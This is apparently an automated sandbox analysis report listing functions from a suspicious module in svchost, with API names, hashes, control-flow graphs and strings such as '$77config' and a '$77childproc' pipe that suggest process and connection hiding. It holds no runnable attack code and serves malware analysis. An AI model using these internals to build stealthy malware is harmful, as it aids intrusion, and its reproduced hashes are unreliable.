                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: fd4cc397893f53735cf364b395b4fabd7387da9bea1c14ab3b2dc466b9a8be75
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 3531D07A394E49E1EB509B36DD403E93394A7CDBC2F2454219E49AB797DF14C4528B10

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00000158709D8270 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: 54be32834677706be69278d553df8f46ab9c44e5ca7b53d497824bc7f3806f3d
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: 46313A7A214F80DAEB608F60E8803EA7364F788745F54442ADB4E5BB99DF38C559CB10
                                                                                                                                  Function 00000158709DCB40 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: 72b933b0e77b6e0ae717d08143115f409b073c01848e22cb3db2aa3d7bb931c7
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: D9416A7A214F80C6EB60CB25E8403EE73A0F7C8795FA40515EB9D5ABA9DF38C556CB40
                                                                                                                                  Function 00000158709DD7D8 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: 8c7ebd7da17ff4c60b475406bc813041573e1bd7b5b0d13cbdad66ba5da6f188
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: 85A1E33A74DA84C9FB219B75DC403ED7BA0A7C9B96F644115DA993F696CE38C443CB00
                                                                                                                                  Function 00000158709D1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306
                                                                                                                                  • Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction ID: d4d80f730e80a4f8d9254abaa6afe0bf8c76a90f8ec6f1969ccd2b8eca49734b
                                                                                                                                  • Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction Fuzzy Hash: 1B71067B610E54D6EB109F75EC907D933A4FBC8B8AF501111EA8D6BB29DE38C856CB40
                                                                                                                                  Function 00000158709D12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: 2302c693d113bf2a915ad50ba5083747d45724e67c005d9d217f03877c1143d0
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: 26512A77218B84D6EB14CF62E84839A77A1F7C8B9AF644124DA495B768DF3CC45ACB00
                                                                                                                                  Function 00000158709DED48 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: 7042ab722a4b17450b2e72e22a8bb17e200c9664d7f2e0b5581a066eebedc37c
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: CA51B63A345E08D1EA59AB56AC003D57350ABCCBB6F684724DE3D6B3D1DF38C8578A50
                                                                                                                                  Function 00000158709D3288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 618a3e9c4df8a7a762312c2b99e3080b16bd3ae9954015b634ef086f8961520d
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: E4318F7A604F45D6E710DF12AD44799B3A0B7D8FC6F648025DE4A6B725EF38D817CA00
                                                                                                                                  Function 00000158709A93EC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: 377a964e5721071aa0970609fa450d7d61c3a3c289014e197656bb0d836589f0
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: 6ED16DBA608B40CAEB60DF259C413DD77A0F78D799F200115EE896BB96DF38C492DB00
                                                                                                                                  Function 00000158709D9FEC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 312 158709d9fec-158709da054 call 158709daf04 315 158709da4b5-158709da4bb call 158709dc148 312->315 316 158709da05a-158709da05d 312->316 316->315 317 158709da063-158709da069 316->317 319 158709da06f-158709da073 317->319 320 158709da138-158709da14a 317->320 319->320 324 158709da079-158709da084 319->324 322 158709da405-158709da409 320->322 323 158709da150-158709da154 320->323 327 158709da442-158709da44c call 158709d90e4 322->327 328 158709da40b-158709da412 322->328 323->322 325 158709da15a-158709da165 323->325 324->320 326 158709da08a-158709da08f 324->326 325->322 329 158709da16b-158709da16f 325->329 326->320 330 158709da095-158709da09f call 158709d90e4 326->330 327->315 341 158709da44e-158709da46d call 158709d7e30 327->341 328->315 331 158709da418-158709da43d call 158709da4bc 328->331 333 158709da335-158709da341 329->333 334 158709da175-158709da1b0 call 158709d94c4 329->334 330->341 346 158709da0a5-158709da0d0 call 158709d90e4 * 2 call 158709d97cc 330->346 331->327 333->327 338 158709da347-158709da34b 333->338 334->333 350 158709da1b6-158709da1bf 334->350 343 158709da34d-158709da359 call 158709d978c 338->343 344 158709da35b-158709da363 338->344 343->344 356 158709da37c-158709da384 343->356 344->327 349 158709da369-158709da376 call 158709d9364 344->349 380 158709da0f0-158709da0fa call 158709d90e4 346->380 381 158709da0d2-158709da0d6 346->381 349->327 349->356 354 158709da1c3-158709da1f5 350->354 358 158709da328-158709da32f 354->358 359 158709da1fb-158709da207 354->359 361 158709da498-158709da4b4 call 158709d90e4 * 2 call 158709dc0b4 356->361 362 158709da38a-158709da38e 356->362 358->333 358->354 359->358 363 158709da20d-158709da22c 359->363 361->315 365 158709da3a1 362->365 366 158709da390-158709da39f call 158709d978c 362->366 367 158709da232-158709da26f call 158709d97a0 * 2 363->367 368 158709da318-158709da31d 363->368 371 158709da3a3-158709da3ad call 158709daf9c 365->371 366->371 392 158709da2a2-158709da2a5 367->392 368->358 371->327 390 158709da3b3-158709da403 call 158709d93f4 call 158709d95f8 371->390 380->320 395 158709da0fc-158709da11c call 158709d90e4 * 2 call 158709daf9c 380->395 381->380 383 158709da0d8-158709da0e3 381->383 383->380 389 158709da0e5-158709da0ea 383->389 389->315 389->380 390->327 398 158709da2a7-158709da2ae 392->398 399 158709da271-158709da297 call 158709d97a0 call 158709da72c 392->399 417 158709da133 395->417 418 158709da11e-158709da128 call 158709db08c 395->418 403 158709da2b0-158709da2b4 398->403 404 158709da31f 398->404 413 158709da2b9-158709da316 call 158709d9f18 399->413 414 158709da299-158709da29c 399->414 403->367 408 158709da324 404->408 408->358 413->408 414->392 417->320 422 158709da492-158709da497 call 158709dc0b4 418->422 423 158709da12e-158709da491 call 158709d8d44 call 158709daae8 call 158709d8f38 418->423 422->361 423->422
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: bfb7d10d16bf97ecc220be747ead0c58b46accd339ced6f35570ff6ba8c4cb6f
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: 2BD1923A648B48CAEB20DF65D8443DD77A0F799789F204115EE896BB97CF34C492CB01
                                                                                                                                  Function 00000158709D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 433 158709d104c-158709d10b9 RegQueryInfoKeyW 434 158709d11b5-158709d11d0 433->434 435 158709d10bf-158709d10c9 433->435 435->434 436 158709d10cf-158709d111f RegEnumValueW 435->436 437 158709d11a5-158709d11af 436->437 438 158709d1125-158709d112a 436->438 437->434 437->436 438->437 439 158709d112c-158709d1135 438->439 440 158709d1147-158709d114c 439->440 441 158709d1137 439->441 443 158709d114e-158709d1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 440->443 444 158709d1199-158709d11a3 440->444 442 158709d113b-158709d113f 441->442 442->437 445 158709d1141-158709d1145 442->445 443->444 444->437 445->440 445->442
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: 0d449c8a788a7c76f8ea385fc5ad28909d68ba12b5fddd9c8f34025eaa0c6d1f
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 10419277218F84D6E760CF61E84439E77A1F389B99F548129DB891B758DF38C48ACB40
                                                                                                                                  Function 00000158709D242C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: a92dc02c939b716f746436801544e1fb0527fb3d7e624fb3fae8380cf38e9771
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: C9111C3A618B40D2E710CB21F85439A7760F7C9BE6F644215EA991ABA8CF7CC55ACF40
                                                                                                                                  Function 00000158709A6E10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: 15ba81216c1147431e7aa418fc66026d5b7287a279c23db10eb9e35c9a9a1630
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 4E81B1B960CE41C6FA54DB25AC423D9B6D0ABCE786F7444259A04AF792DF38C847EF00
                                                                                                                                  Function 00000158709D6030 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction ID: 334f1eca35c14b771b8e79a32aba974ff0c233920e1666ba3cdaa79ca6aadf26
                                                                                                                                  • Opcode Fuzzy Hash: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction Fuzzy Hash: 9FD16A7A248F88C1DA70DB16E89439AB7A4F7CCB89F204516EA8D5B7A5DF38C551CF00
                                                                                                                                  Function 00000158709D3398 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 756756679-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 0b5e07a07a647275a79d984ae3c683179e83be7b0b93cafca44266392f5a1d69
